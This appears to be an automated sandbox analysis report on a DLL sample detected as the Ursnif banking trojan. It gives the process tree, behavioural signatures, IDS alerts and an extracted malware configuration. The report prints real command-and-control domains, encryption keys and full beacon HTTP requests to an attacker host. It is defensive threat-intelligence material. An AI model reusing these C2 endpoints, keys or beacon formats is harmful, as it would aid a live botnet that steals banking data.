Play interactive tour

Edit tour

Windows Analysis Report mental.dll

Overview

General Information

Sample Name:	mental.dll
Analysis ID:	455445
MD5:	244fcb71c16ab8163f25c633dcb91b1c
SHA1:	cf0256c44be6b311558358bb00f9ec257ec90236
SHA256:	48589e8612584c5b67c325367e53b63379dbf984a0a0dc905bd29fd3f7fd6c03
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Ursnif

Writes or reads registry keys via WMI

Writes registry values via WMI

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found evasive API chain (may stop execution after checking a module file name)

Found evasive API chain checking for process token information

Internet Provider seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

Queries the installation date of Windows

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6608 cmdline: loaddll32.exe 'C:\Users\user\Desktop\mental.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 6624 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\mental.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6644 cmdline: rundll32.exe 'C:\Users\user\Desktop\mental.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6632 cmdline: rundll32.exe C:\Users\user\Desktop\mental.dll,Behind MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6720 cmdline: rundll32.exe C:\Users\user\Desktop\mental.dll,Factpresent MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6736 cmdline: rundll32.exe C:\Users\user\Desktop\mental.dll,Steadunder MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 5608 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5532 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5608 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 3064 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5608 CREDAT:17420 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "5/Y58l5cMfSS6UVE2qwUPZ8h4BZIDuitNieuSeExhGIYp38mO1KlDb9BgD8MZDpCVIqOs83i+UuS7wSTYyLzqLIpEfJvw6IqNOxE0Nj1pnQUhkMjOOyeKT26+dcTRw0X3cDnXGQeXK0BURYDVIi9qI6C9idxUYquGCxlZ3M8J0VdrIL6/2Z4IWUGU9Fobm/mPnd9dMNDYBJzN5iMU0/zCaGPmjT/gVPYhstSarstSrBXvVQck6yXEgx0w1ETruWctJSlrx1LRl0Wqr6+4Ts0TQO/lRIcDE4if5nsnojzxswoVvIRdpxV7UOjuZphAusEANjuHiVamP6ZL+7s3D+g4AuY4oLOSzm+52Ja3ImN5vo=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "MEvpZnH81JLxaRqa", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.894024804.0000000003D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.894006567.0000000003D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.894036299.0000000003D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.858380580.0000000005018000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.858493961.0000000005018000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000002.925438846.0000000005018000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.893911104.0000000003D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.893958439.0000000003D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.858602685.0000000005018000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.858556678.0000000005018000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.893875579.0000000003D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.858220595.0000000005018000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.924921046.0000000003D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.858579008.0000000005018000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.858117816.0000000005018000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.858445363.0000000005018000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.893935823.0000000003D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.893978637.0000000003D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 6644	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 6608	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 15 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://gtr.antoinfer.com/mtJPbIZJhao/lLJRN3LZO2EvFc/VCw3UNiKyARh06G8CFACi/rvcu9DoT_2BWr3it/vuHuzB9pSHcZY8A/p5jj60CzJBYl9Lfa6y/ccpCtNQRI/kv6KUXrsc9szPvU9BS5d/INRHtQMx8ovuxsrRsSO/mBIUAu_2FXqDwSewtqhiF3/0y8M31aLbHe6S/83PL1bM6/ldvb9gwpgUV8X_2B2Qv6zJW/BQrwXyajxR/YXD2Kky6T0oSJ5G0A/e_2F9JsAj5ok/7mc5pqASMOR/DpTFFPntUkci7e/xU2mysx12dViVQ0ZXlm39/NDqJB6CJvjFI/z	Avira URL Cloud: Label: malware
Source: http://gtr.antoinfer.com/02_2FRTV/EHY6_2ByVkK9zQWc7nVUHSO/fCtXqnqrPU/KM_2F1pf6mYZC4Gy7/bCWjowHLoe6i/IkZQTMTSLWC/A3a2f6f53ufRn9/E42sf0Trx1PwCM3URc2Wx/3meR8N06RbC7B5vz/fh1949JUpwcTC55/kxUMJM7FV5_2BW6yUI/Qi_2BBp7I/IolDvBZlj8BdCBHYqi7w/k9qRhAJwmrlYaX4Nld1/vuyMEecPRgPCKMIqpUl9z0/QU_2BZUyIrn6K/_2FFz5g9/uSWx1VCCRu0cJ4rt581fcIt/_2BF5K79Db/sITOyBjswJkOChsry/YZZI09hn/M	Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000003.00000003.773640862.0000000000780000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "5/Y58l5cMfSS6UVE2qwUPZ8h4BZIDuitNieuSeExhGIYp38mO1KlDb9BgD8MZDpCVIqOs83i+UuS7wSTYyLzqLIpEfJvw6IqNOxE0Nj1pnQUhkMjOOyeKT26+dcTRw0X3cDnXGQeXK0BURYDVIi9qI6C9idxUYquGCxlZ3M8J0VdrIL6/2Z4IWUGU9Fobm/mPnd9dMNDYBJzN5iMU0/zCaGPmjT/gVPYhstSarstSrBXvVQck6yXEgx0w1ETruWctJSlrx1LRl0Wqr6+4Ts0TQO/lRIcDE4if5nsnojzxswoVvIRdpxV7UOjuZphAusEANjuHiVamP6ZL+7s3D+g4AuY4oLOSzm+52Ja3ImN5vo=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "MEvpZnH81JLxaRqa", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Multi AV Scanner detection for domain / URL

Show sources

Source: gtr.antoinfer.com

Virustotal: Detection: 7%

Perma Link

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00DE39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007939C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

Source: mental.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: mental.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\135\Dark\841\582_Free\Thin\Segment.pdb source: loaddll32.exe, rundll32.exe, mental.dll

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49741 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49741 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49746 -> 185.228.233.17:80

Source: Joe Sandbox View

ASN Name: ITOS-ASRU ITOS-ASRU

Source: global traffic	HTTP traffic detected: GET /02_2FRTV/EHY6_2ByVkK9zQWc7nVUHSO/fCtXqnqrPU/KM_2F1pf6mYZC4Gy7/bCWjowHLoe6i/IkZQTMTSLWC/A3a2f6f53ufRn9/E42sf0Trx1PwCM3URc2Wx/3meR8N06RbC7B5vz/fh1949JUpwcTC55/kxUMJM7FV5_2BW6yUI/Qi_2BBp7I/IolDvBZlj8BdCBHYqi7w/k9qRhAJwmrlYaX4Nld1/vuyMEecPRgPCKMIqpUl9z0/QU_2BZUyIrn6K/_2FFz5g9/uSWx1VCCRu0cJ4rt581fcIt/_2BF5K79Db/sITOyBjswJkOChsry/YZZI09hn/M HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mtJPbIZJhao/lLJRN3LZO2EvFc/VCw3UNiKyARh06G8CFACi/rvcu9DoT_2BWr3it/vuHuzB9pSHcZY8A/p5jj60CzJBYl9Lfa6y/ccpCtNQRI/kv6KUXrsc9szPvU9BS5d/INRHtQMx8ovuxsrRsSO/mBIUAu_2FXqDwSewtqhiF3/0y8M31aLbHe6S/83PL1bM6/ldvb9gwpgUV8X_2B2Qv6zJW/BQrwXyajxR/YXD2Kky6T0oSJ5G0A/e_2F9JsAj5ok/7mc5pqASMOR/DpTFFPntUkci7e/xU2mysx12dViVQ0ZXlm39/NDqJB6CJvjFI/z HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: gtr.antoinfer.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.894024804.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.894006567.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.894036299.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858380580.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858493961.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.925438846.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893911104.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893958439.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858602685.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858556678.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893875579.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858220595.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.924921046.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858579008.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858117816.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858445363.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893935823.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893978637.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6608, type: MEMORYSTR

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.894024804.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.894006567.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.894036299.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858380580.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858493961.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.925438846.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893911104.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893958439.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858602685.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858556678.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893875579.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858220595.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.924921046.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858579008.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858117816.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858445363.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893935823.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893978637.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6608, type: MEMORYSTR

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00DE39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007939C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D471EC7 NtMapViewOfSection,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D471B9C GetProcAddress,NtCreateSection,memset,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D472485 NtQueryVirtualMemory,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00DE2D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00DE8005 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00792D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00798005 NtQueryVirtualMemory,

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D472264
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00DE2206
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00DE7DE0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00DE3109
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D48DCB0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D48C9A5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D48387C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D48B024
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D47FE5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00792206
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00793109
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00797DE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D48DCB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D48C9A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D48387C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D48B024
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D47FE5A

Source: mental.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal88.troj.winDLL@16/8@2/2

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00DE513E CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{9D47ABEC-EF99-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF6E67667E2D178577.TMP

Jump to behavior

Source: mental.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mental.dll,Behind

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\mental.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\mental.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mental.dll,Behind
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\mental.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mental.dll,Factpresent
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mental.dll,Steadunder
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5608 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5608 CREDAT:17420 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\mental.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mental.dll,Behind
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mental.dll,Factpresent
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mental.dll,Steadunder
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\mental.dll',#1
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5608 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5608 CREDAT:17420 /prefetch:2

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: mental.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: mental.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: c:\135\Dark\841\582_Free\Thin\Segment.pdb source: loaddll32.exe, rundll32.exe, mental.dll

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D471F7C LoadLibraryA,GetProcAddress,

Source: mental.dll

Static PE information: real checksum: 0x62305 should be: 0x670d4

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D472253 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D472200 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00DE7A60 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00DE7DCF push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D48FC77 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D490CBF push ss; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D47F7C5 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D493AAC push ecx; retf
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4CBA1A push A00002CFh; iretd
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00797A60 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00797DCF push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4941C6 pushad ; iretd
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D48FC77 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D490CBF push ss; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D493F7D pushad ; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D47F7C5 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D493AAC push ecx; retf
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4CBA1A push A00002CFh; iretd

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.894024804.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.894006567.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.894036299.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858380580.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858493961.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.925438846.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893911104.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893958439.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858602685.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858556678.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893875579.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858220595.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.924921046.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858579008.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858117816.0000000005018000.00000004.00000040.sdmp, type: MEMORY
